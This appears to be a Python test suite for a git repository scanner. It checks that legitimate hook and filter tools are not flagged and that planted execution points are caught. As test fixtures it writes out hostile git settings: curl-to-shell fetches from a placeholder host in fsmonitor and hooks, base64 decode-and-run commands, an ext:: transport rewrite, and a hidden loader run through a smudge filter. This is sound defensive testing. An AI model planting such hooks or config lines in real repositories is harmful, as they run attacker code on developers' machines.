#!/usr/bin/env python3
"""What git runs for a repository: legitimate tools stay unconfirmed, planted commands are caught,
and reading the configuration never runs it."""
from __future__ import annotations

import os
import stat
import uuid
from pathlib import Path

from stayawake.bots.security.matchers.git_exec_surface import (PAYLOAD_SIGNATURE, RUNS_SIGNATURE,
                                                               SUSPICIOUS_SIGNATURE)
from stayawake.bots.security.models import CONFIRMED, HEURISTIC, INFORMATIONAL
from stayawake.bots.security.scanner import scan_target
from stayawake.bots.security.signatures import load_signatures
from stayawake.bots.security.targets import ScanOptions
from stayawake.bots.security.targets.local import LocalRepoTarget
from stayawake.bots.security import hookscript
from tests.support.gitrepo import GitSandbox

LOADER = "global['_V'] = '8-st14';\n"
GIT_EXEC = {PAYLOAD_SIGNATURE, SUSPICIOUS_SIGNATURE, RUNS_SIGNATURE}


class ExecSurfaceSandbox(GitSandbox):
    """Build a committed repository, then plant configuration and hooks by writing files, so no
    git command runs after the plant."""

    def repo(self, name: str = "repo") -> Path:
        repo = self.new_repo(name)
        self.write(repo, "README.md", "hello\n")
        self.commit(repo, "init")
        return repo

    def append_config(self, repo: Path, text: str, rel: str = ".git/config") -> None:
        path = repo / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        with open(path, "a", encoding="utf-8") as fh:
            fh.write(text)

    def hook(self, directory: Path, name: str, text: str) -> Path:
        directory.mkdir(parents=True, exist_ok=True)
        path = directory / name
        path.write_text(text, encoding="utf-8")
        path.chmod(path.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
        return path

    def scan(self, repo: Path):
        return scan_target(LocalRepoTarget(repo, str(repo), ScanOptions()), load_signatures(), [])

    def graded(self, repo: Path) -> dict[str, list]:
        result = self.scan(repo)
        tiers = {CONFIRMED: [], HEURISTIC: [], INFORMATIONAL: []}
        for f in result.findings + result.informational:
            if f.signature_id in GIT_EXEC:
                tiers[f.confidence].append(f)
        tiers["result"] = result
        return tiers


_LFS_HOOK = ('#!/bin/sh\ncommand -v git-lfs >/dev/null 2>&1 || { printf >&2 "\\n%s\\n\\n" '
             '"This repository is configured for Git LFS but \'git-lfs\' was not found on your '
             'path."; exit 2; }\ngit lfs {name} "$@"\n')
_PRE_COMMIT_HOOK = """#!/usr/bin/env bash
# File generated by pre-commit: https://pre-commit.com
# ID: 138fd403232d2ddd5efb44317e38bf03

# start templated
INSTALL_PYTHON=/usr/bin/python3
ARGS=(hook-impl --config=.pre-commit-config.yaml --hook-type=pre-commit)
# end templated

HERE="$(cd "$(dirname "$0")" && pwd)"
ARGS+=(--hook-dir "$HERE" -- "$@")

if [ -x "$INSTALL_PYTHON" ]; then
    exec "$INSTALL_PYTHON" -mpre_commit "${ARGS[@]}"
elif command -v pre-commit > /dev/null; then
    exec pre-commit "${ARGS[@]}"
else
    echo '`pre-commit` not found.  Did you forget to activate your virtualenv?' 1>&2
    exit 1
fi
"""
_HUSKY_STUB = '#!/usr/bin/env sh\n. "$(dirname "$0")/h"\n'
_HUSKY_H = """#!/usr/bin/env sh
[ "$HUSKY" = "2" ] && set -x
n=$(basename "$0")
s=$(dirname "$(dirname "$0")")/$n

[ ! -f "$s" ] && exit 0

if [ -f "$HOME/.huskyrc" ]; then
	echo "husky - '~/.huskyrc' is DEPRECATED, please move your code to ~/.config/husky/init.sh"
fi
i="${XDG_CONFIG_HOME:-$HOME/.config}/husky/init.sh"
[ -f "$i" ] && . "$i"

[ "${HUSKY-}" = "0" ] && exit 0

export PATH="node_modules/.bin:$PATH"
sh -e "$s" "$@"
c=$?

[ $c != 0 ] && echo "husky - $n script failed (code $c)"
[ $c = 127 ] && echo "husky - command not found in PATH=$PATH"
exit $c
"""
_LEFTHOOK_HOOK = """#!/bin/sh

if [ "$LEFTHOOK_VERBOSE" = "1" -o "$LEFTHOOK_VERBOSE" = "true" ]; then
  set -x
fi

if [ "$LEFTHOOK" = "0" ]; then
  exit 0
fi

call_lefthook()
{
  if test -n "$LEFTHOOK_BIN"
  then
    "$LEFTHOOK_BIN" "$@"
  elif lefthook -h >/dev/null 2>&1
  then
    lefthook "$@"
  else
    dir="$(git rev-parse --show-toplevel)"
    osArch=$(uname | tr '[:upper:]' '[:lower:]')
    cpuArch=$(uname -m | sed 's/aarch64/arm64/;s/x86_64/x64/')
    if test -f "$dir/node_modules/lefthook-${osArch}-${cpuArch}/bin/lefthook"
    then
      "$dir/node_modules/lefthook-${osArch}-${cpuArch}/bin/lefthook" "$@"
    elif command -v npx >/dev/null 2>&1
    then
      npx lefthook "$@"
    else
      echo "Can't find lefthook in PATH"
    fi
  fi
}

call_lefthook run "pre-commit" "$@"
"""


class TestLegitimateToolsAreNotConfirmed(ExecSurfaceSandbox):
    """Each shape here is a real tool's configuration; none may be confirmed or suspicious."""

    def assert_only_informational(self, repo: Path, at_least: int = 1):
        tiers = self.graded(repo)
        self.assertEqual([f.evidence for f in tiers[CONFIRMED]], [])
        self.assertEqual([(f.evidence, f.description) for f in tiers[HEURISTIC]], [])
        self.assertIsNone(tiers["result"].error)
        self.assertGreaterEqual(len(tiers[INFORMATIONAL]), at_least)
        return tiers

    def test_git_lfs_filters_and_hooks(self):
        repo = self.repo()
        self.write(repo, ".gitattributes", "*.psd filter=lfs diff=lfs merge=lfs -text\n")
        self.append_config(repo, '[filter "lfs"]\n\tclean = git-lfs clean -- %f\n'
                                 '\tsmudge = git-lfs smudge -- %f\n\tprocess = git-lfs filter-process\n'
                                 '\trequired = true\n')
        for name in ("pre-push", "post-checkout", "post-commit", "post-merge"):
            self.hook(repo / ".git" / "hooks", name, _LFS_HOOK.replace("{name}", name))
        tiers = self.assert_only_informational(repo, at_least=7)
        self.assertEqual(tiers["result"].verdict, "clean")

    def test_git_crypt(self):
        repo = self.repo()
        self.write(repo, ".gitattributes", "secret/** filter=git-crypt diff=git-crypt\n")
        self.append_config(repo, '[filter "git-crypt"]\n\tsmudge = \\"git-crypt\\" smudge\n'
                                 '\tclean = \\"git-crypt\\" clean\n\trequired = true\n'
                                 '[diff "git-crypt"]\n\ttextconv = \\"git-crypt\\" diff\n')
        self.assert_only_informational(repo, at_least=3)

    def test_pre_commit_framework_hook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "pre-commit", _PRE_COMMIT_HOOK)
        self.assert_only_informational(repo)

    def test_husky_v9(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        self.hook(repo / ".husky" / "_", "pre-commit", _HUSKY_STUB)
        self.hook(repo / ".husky" / "_", "h", _HUSKY_H)
        self.write(repo, ".husky/pre-commit", "npm test\n")
        self.assert_only_informational(repo, at_least=2)

    def test_lefthook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "pre-commit", _LEFTHOOK_HOOK)
        self.assert_only_informational(repo)

    def test_nbstripout(self):
        repo = self.repo()
        self.write(repo, ".git/info/attributes", "*.ipynb filter=nbstripout\n*.zpln filter=nbstripout\n"
                                                 "*.ipynb diff=ipynb\n")
        self.append_config(repo, '[filter "nbstripout"]\n\tclean = \\"/usr/bin/python3\\" -m nbstripout\n'
                                 '\tsmudge = cat\n[diff "ipynb"]\n'
                                 '\ttextconv = \\"/usr/bin/python3\\" -m nbstripout -t\n')
        self.assert_only_informational(repo, at_least=3)

    def test_textconv_for_pdf_exif_sqlite(self):
        repo = self.repo()
        self.write(repo, ".gitattributes", "*.pdf diff=pdf\n*.jpg diff=exif\n*.db diff=sqlite3\n")
        self.append_config(repo, '[diff "pdf"]\n\ttextconv = pdftotext -layout\n'
                                 '[diff "exif"]\n\ttextconv = exiftool\n'
                                 '[diff "sqlite3"]\n\ttextconv = "echo .dump | sqlite3"\n'
                                 '\tbinary = true\n')
        self.assert_only_informational(repo, at_least=3)

    def test_watchman_and_rs_git_fsmonitor(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "query-watchman",
                  "#!/usr/bin/perl\nuse strict;\nuse warnings;\nmy ($version, $time) = @ARGV;\n")
        self.append_config(repo, "[core]\n\tfsmonitor = .git/hooks/query-watchman\n")
        self.assert_only_informational(repo)
        other = self.repo("other")
        self.append_config(other, "[core]\n\tfsmonitor = rs-git-fsmonitor\n")
        self.assert_only_informational(other)

    def test_ssh_command_credential_helper_and_a_relative_include(self):
        repo = self.repo()
        self.write(repo, ".gitconfig", "[user]\n\tname = Someone\n")
        self.append_config(repo, '[core]\n\tsshCommand = ssh -i ~/.ssh/work\n'
                                 '[credential]\n\thelper = osxkeychain\n'
                                 '[include]\n\tpath = ../.gitconfig\n')
        self.assert_only_informational(repo, at_least=2)

    def test_a_driver_no_attribute_selects_is_not_listed(self):
        repo = self.repo()
        self.append_config(repo, '[filter "unused"]\n\tsmudge = some-tool\n')
        self.assertEqual(self.graded(repo)[INFORMATIONAL], [])

    def test_a_pristine_saw_hook_is_omitted(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "post-checkout",
                  hookscript.render("post-checkout", "/usr/local/bin/saw", None))
        self.assertEqual(self.graded(repo)[INFORMATIONAL], [])


class TestPlantedCommandsAreCaught(ExecSurfaceSandbox):

    def assert_tier(self, repo: Path, tier: str):
        tiers = self.graded(repo)
        self.assertTrue(tiers[tier], f"expected a {tier} git-exec finding; got "
                        f"{[(f.signature_id, f.evidence) for t in (CONFIRMED, HEURISTIC, INFORMATIONAL) for f in tiers[t]]}")
        return tiers

    def test_fsmonitor_inline_node(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = node -e \\\"require('child_process')"
                                 ".exec('id')\\\"\n")
        self.assert_tier(repo, HEURISTIC)

    def test_fsmonitor_inline_node_that_decodes_and_runs(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = node -e \\\"eval(Buffer.from('aWQ=',"
                                 "'base64').toString())\\\"\n")
        tiers = self.assert_tier(repo, CONFIRMED)
        self.assertEqual(tiers["result"].verdict, "infected")

    def test_fsmonitor_fetch_to_shell(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tfsmonitor = curl -s https://example.invalid/x | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_command_carrying_a_payload_fingerprint(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\teditor = node -e \\\"global['_V']='8-st14'\\\"\n")
        self.assert_tier(repo, CONFIRMED)

    def test_a_hook_that_fetches_and_runs(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "post-merge",
                  "#!/bin/sh\ncurl -fsSL https://example.invalid/i | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_hooks_path_in_scratch(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = /tmp/.x\n")
        self.assert_tier(repo, HEURISTIC)

    def test_loader_appended_to_a_husky_hook(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        self.hook(repo / ".husky" / "_", "pre-commit", _HUSKY_STUB + LOADER)
        self.assert_tier(repo, CONFIRMED)

    def test_loader_appended_to_a_pre_commit_hook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "pre-commit", _PRE_COMMIT_HOOK + LOADER)
        tiers = self.assert_tier(repo, CONFIRMED)
        self.assertEqual(tiers[CONFIRMED][0].payload_paths, (".git/hooks/pre-commit",))

    def test_loader_in_a_hook_outside_the_directory_hooks_run_from(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\thooksPath = .husky/_\n")
        self.hook(repo / ".git" / "hooks", "post-checkout", LOADER)
        self.assert_tier(repo, CONFIRMED)

    def test_smudge_filter_runs_a_payload_hidden_in_objects(self):
        repo = self.repo()
        (repo / ".git" / "objects" / ".x.js").write_text(LOADER, encoding="utf-8")
        self.write(repo, ".git/info/attributes", "* filter=x\n")
        self.append_config(repo, '[filter "x"]\n\tsmudge = node .git/objects/.x.js\n')
        tiers = self.assert_tier(repo, CONFIRMED)
        self.assertEqual(tiers[CONFIRMED][0].payload_paths, (".git/objects/.x.js",))

    def test_smudge_filter_running_a_file_inside_the_git_directory(self):
        repo = self.repo()
        (repo / ".git" / "objects" / ".x.js").write_text("console.log(1)\n", encoding="utf-8")
        self.write(repo, ".git/info/attributes", "* filter=x\n")
        self.append_config(repo, '[filter "x"]\n\tsmudge = node .git/objects/.x.js\n')
        self.assert_tier(repo, HEURISTIC)

    def test_ext_transport_rewrite(self):
        repo = self.repo()
        self.append_config(repo, '[url "ext::sh -c touch% /tmp/pwned"]\n\tinsteadOf = https://\n')
        self.assert_tier(repo, HEURISTIC)
        other = self.repo("other")
        self.append_config(other, "[protocol \"ext\"]\n\tallow = always\n")
        self.assert_tier(other, HEURISTIC)

    def test_include_from_scratch_setting_the_pager(self):
        planted = Path("/tmp") / f"saw-test-{uuid.uuid4().hex}.cfg"
        planted.write_text("[core]\n\tpager = less\n", encoding="utf-8")
        self.addCleanup(planted.unlink)
        repo = self.repo()
        self.append_config(repo, f"[include]\n\tpath = {planted}\n")
        tiers = self.assert_tier(repo, HEURISTIC)
        self.assertTrue(any(f.evidence == "core.pager = less" for f in tiers[INFORMATIONAL]))

    def test_ssh_command_that_decodes_and_runs(self):
        repo = self.repo()
        self.append_config(repo, "[core]\n\tsshCommand = sh -c 'echo aWQ= | base64 -d | sh'\n")
        self.assert_tier(repo, HEURISTIC)

    def test_an_altered_saw_hook(self):
        repo = self.repo()
        self.hook(repo / ".git" / "hooks", "post-checkout",
                  hookscript.render("post-checkout", "/usr/local/bin/saw", None) + "id\n")
        self.assert_tier(repo, HEURISTIC)

    def test_config_of_a_submodule_git_dir(self):
        repo = self.repo()
        module = repo / ".git" / "modules" / "lib"
        module.mkdir(parents=True)
        (module / "HEAD").write_text("ref: refs/heads/main\n")
        (module / "config").write_text("[core]\n\tfsmonitor = curl -s https://example.invalid | sh\n")
        self.assert_tier(repo, CONFIRMED)

    def test_unreadable_configuration_is_not_examined(self):
        repo = self.repo()
        include = repo / "fifo"
        os.mkfifo(include)
        self.append_config(repo, f"[include]\n\tpath = {include}\n")
        result = self.scan(repo)
        self.assertIsNotNone(result.error)
        self.assertIn("git configuration", result.error)


class TestReadingNeverRunsTheConfiguration(ExecSurfaceSandbox):
    """Every key git executes is set to write a sentinel; a scan must leave no sentinel behind."""

    def test_a_scan_runs_nothing_the_repository_configures(self):
        repo = self.repo()
        sentinel = self.root / "ran"
        touch = f"touch {sentinel}"
        self.write(repo, ".git/info/attributes", "* filter=s diff=s merge=s\n")
        self.write(repo, ".gitattributes", "* filter=s diff=s merge=s\n")
        included = self.root / "included.cfg"
        included.write_text(f"[core]\n\tpager = {touch}\n\teditor = {touch}\n", encoding="utf-8")
        self.append_config(repo, (
            f"[core]\n\tfsmonitor = {touch}\n\tsshCommand = {touch}\n\taskPass = {touch}\n"
            f"\tgitProxy = {touch}\n"
            f'[filter "s"]\n\tclean = {touch}\n\tsmudge = {touch}\n\tprocess = {touch}\n'
            f"\trequired = true\n"
            f'[diff "s"]\n\ttextconv = {touch}\n\tcommand = {touch}\n'
            f"[diff]\n\texternal = {touch}\n"
            f'[merge "s"]\n\tdriver = {touch}\n'
            f"[credential]\n\thelper = !{touch}\n"
            f"[gpg]\n\tprogram = {touch}\n"
            f'[remote "origin"]\n\turl = /nonexistent\n\tuploadpack = {touch}\n'
            f"[include]\n\tpath = {included}\n"))
        from stayawake.lib.git.exec_surface import HOOK_NAMES
        for name in HOOK_NAMES:
            self.hook(repo / ".git" / "hooks", name, f"#!/bin/sh\n{touch}\n")
        tiers = self.graded(repo)
        self.assertFalse(sentinel.exists(), "reading the repository ran something it configures")
        self.assertTrue(tiers[INFORMATIONAL])


if __name__ == "__main__":
    import unittest
    unittest.main()
